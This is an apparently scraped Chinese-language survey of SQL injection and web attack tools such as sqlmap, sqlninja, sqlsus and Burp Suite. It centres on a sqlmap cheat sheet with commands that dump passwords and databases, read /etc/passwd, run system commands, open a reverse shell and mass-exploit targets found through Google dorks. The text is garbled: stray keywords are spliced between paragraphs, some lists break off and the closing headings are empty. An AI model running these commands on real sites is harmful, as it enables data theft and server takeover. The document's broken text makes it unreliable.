bbqsql是一个Python编写的盲注工具,当检测可疑的注入漏洞时会颇有用,同时bbqsql是一个半自动工具,容许客户自定参数。java
DBPwAudit是一个数据库用户名和密码枚举工具。python
图形化的密码破解与链接工具,开源。
mysql
jsql是一款轻量级安全测试工具,能够探测SQL注入漏洞,它跨平台,开源免费,将存在注入漏洞的URL贴进来便可进行漏洞利用,图形化界面亲民,但使用效果有待提升。
web
包括一下几个子工具,具体状况具体分析使用:sql
该工具是一个Java开发的Oracle评估工具,它是基于插件结构的,当前有两个插件能够作:shell
一样是针对Oracle的SID链接暴力枚举的工具,SID为Oracle实例化,Oracle链接字符串,经过实例名+用户+密码链接。
数据库
容许用户向Oracle数据库中注入命令执行。
浏览器
它是一个开放源代码的MySQL注入和接管工具,sqlsus使用perl编写,基于命令行界面。sqlsus能够获取数据库结构,注入本身的sql语句,从服务器下载文件,爬行web站点可写目录,上传和控制后面人,克隆数据库等等。最好用的两点是注射获取数据的速度很是快,另一个最大的特色是自动搜索可写目录。首先得生成配置文件sqlsus -g test.conf
,而后对配置文件进行修改;接着使用sqlsus test.conf
进行注入。
安全
在sql注入方面一直尊sqlmap为神奇,但sqlninja也有本身的特色。
sqlninja是一款perl语言编写的一个专门针对MSQSQL的注入工具。和市面上其余注入工具不一样,sqlninja没有花费精力再跑数据库上,而专一于获取一个shell,其优势以下:服务器
sqlmap是一个开源的漏洞测试工具,它主要用于自动化地侦测和实施SQL注入攻击以及渗透数据库服务器。SQLMAP配有强大的侦测引擎,适用于高级渗透测试用户,不只能够得到不一样数据库的指纹信息,还能够从数据库中提取数据,此外还可以处理潜在的文件系统以及经过带外数据链接执行系统命令等。
sqlmap经常使用命令:
sqlmap -u "http://url/news?id=1" –current-user #获取当前用户名称 sqlmap -u "http://www.xxoo.com/news?id=1" –current-db #获取当前数据库名称 sqlmap -u "http://www.xxoo.com/news?id=1" –tables -D "db_name" #列表名 sqlmap -u "http://url/news?id=1" –columns -T "tablename" users-D "db_name" -v 0 #列字段 sqlmap -u "http://url/news?id=1" –dump -C "column_name" -T "table_name" -D "db_name" -v 0 #获取字段内容
sqlmap -u "http://url/news?id=1" –smart –level 3 –users # smart智能 level 执行测试等级 sqlmap -u "http://url/news?id=1" –dbms "Mysql" –users # dbms 指定数据库类型 sqlmap -u "http://url/news?id=1" –users #列数据库用户 sqlmap -u "http://url/news?id=1" –dbs#列数据库 sqlmap -u "http://url/news?id=1" –passwords #数据库用户密码 sqlmap -u "http://url/news?id=1" –passwords-U root -v 0 #列出指定用户数据库密码 sqlmap -u "http://url/news?id=1" –dump -C "password,user,id" -T "tablename" -D "db_name" –start 1 –stop 20 #列出指定字段,列出20条 sqlmap -u "http://url/news?id=1" –dump-all -v 0 #列出全部数据库全部表 sqlmap -u "http://url/news?id=1" –privileges #查看权限 sqlmap -u "http://url/news?id=1" –privileges -U root #查看指定用户权限 sqlmap -u "http://url/news?id=1" –is-dba -v 1 #是不是数据库管理员 sqlmap -u "http://url/news?id=1" –roles #枚举数据库用户角色 sqlmap -u "http://url/news?id=1" –udf-inject #导入用户自定义函数(获取系统权限!) sqlmap -u "http://url/news?id=1" –dump-all –exclude-sysdbs -v 0 #列出当前库全部表 sqlmap -u "http://url/news?id=1" –union-cols #union 查询表记录 sqlmap -u "http://url/news?id=1" –cookie "COOKIE_VALUE" #cookie注入 sqlmap -u "http://url/news?id=1" -b #获取banner信息 sqlmap -u "http://url/news?id=1" –data "id=3" #post注入 sqlmap -u "http://url/news?id=1" -v 1 -f #指纹判别数据库类型 sqlmap -u "http://url/news?id=1" –proxy"http://127.0.0.1:8118" #代理注入 sqlmap -u "http://url/news?id=1″–string”STRING_ON_TRUE_PAGE" #指定关键词 sqlmap -u "http://url/news?id=1" –sql-shell #执行指定sql命令 sqlmap -u "http://url/news?id=1" –file /etc/passwd python sqlmap/sqlmap.py -u "http://url/news?id=1" –os-cmd=whoami #执行系统命令 sqlmap -u "http://url/news?id=1" –os-shell #系统交互shell sqlmap -u "http://url/news?id=1" –os-pwn #反弹shell sqlmap -u "http://url/news?id=1" –reg-read #读取win系统注册表 sqlmap -u "http://url/news?id=1" –dbs-o "sqlmap.log" #保存进度 sqlmap -u "http://url/news?id=1" –dbs -o "sqlmap.log" –resume #恢复已保存进度 sqlmap -g "google语法" –dump-all –batch #google搜索注入点自动 跑出全部字段攻击实例 sqlmap -u "http://url/news?id=1&Submit=Submit" –cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" –string="Surname" –dbms=mysql –users –password
经过应用代理分析数据包,或修改数据包重放、暴力攻击等安全测试中常常用到。
vega是一个开放源代码的web应用程序安全测试平台,Vega可以帮助用户验证sql注入、跨站脚本、敏感信息泄露和其余一些安全漏洞,Vega使用java编写,有GUI,能够在Linux、OS X和Windows上运行,vega相似于怕肉丝 proxy等。
该软件是一款代理软件,包括HTTP代理,网络爬虫、网络蜘蛛,会话ID分析,自动脚本接口。模糊测试工具,WEB格式的编码/解码,web服务描述语言和soap解析器等功能模块,它基于GNU协议使用java编写,是Webgoat中使用的工具之一。
paros proxy 是一个对web应用程序的漏洞进行评估的代理程序,即一个基于java的web代理程序,能够评估web应用程序漏洞。它支持动态地编辑/查看http/https,从而改变cookie和表单字段等项目;它包括一个web通讯记录程序,web全套程序,hash计算器,还有一个能够测试常见的web应用程序攻击的扫描器。该工具检查漏洞形式包括:
burpsuite是用于攻击web应用程序的处理平台,它也是一个代理,经过默认端口8080运行。使用这个代理,咱们能够截获和修改从客户端到web应用程序的数据包。它包含了一系列burp工具,这些工具之间有大量接口能够互相通讯,这样设计的目的是为了促进和提升真个攻击效率。平台中全部工具共享同一robust框架,以便统一处理HTTP请求,持久性,认证,上游代理,日志记录,报警和可扩展性。
burpsuite容许攻击者结合手工和自动技术去枚举、分析、攻击web应用程序。这些不一样的burp工具经过协同工做,有效的分享信息,支持一某种工具中的信息为基础供另外一种工具使用的方式发起攻击。
bed(bruteforce exploit dectector)是一个纯文本协议的Fuzz工具,可以检查常见的漏洞,如缓冲区溢出,格式串漏洞,整数溢出等。
THC出品的针对IPv6协议的模糊测试工具。
针对web应用的模糊测试工具 ,能够进行web;应用暴力破解,也支持对网站目录、登陆信息、应用资源文件等的暴力猜解,还能够进行get和post参数的猜解,sql注入、xss漏洞的测试等。该工具全部功能都依赖于字典。
主要是对一个页面或一个点进行测试,看是否存在xss漏洞。
web应用体系结构
web应用安全威胁
攻击web服务器软件的方式:
攻击web应用程序
攻击web数据内容
SQL注入的攻击步骤和过程
web浏览器软件的安全困境三要素:复杂性、可扩展性、连通性方面。
网页挂马策略: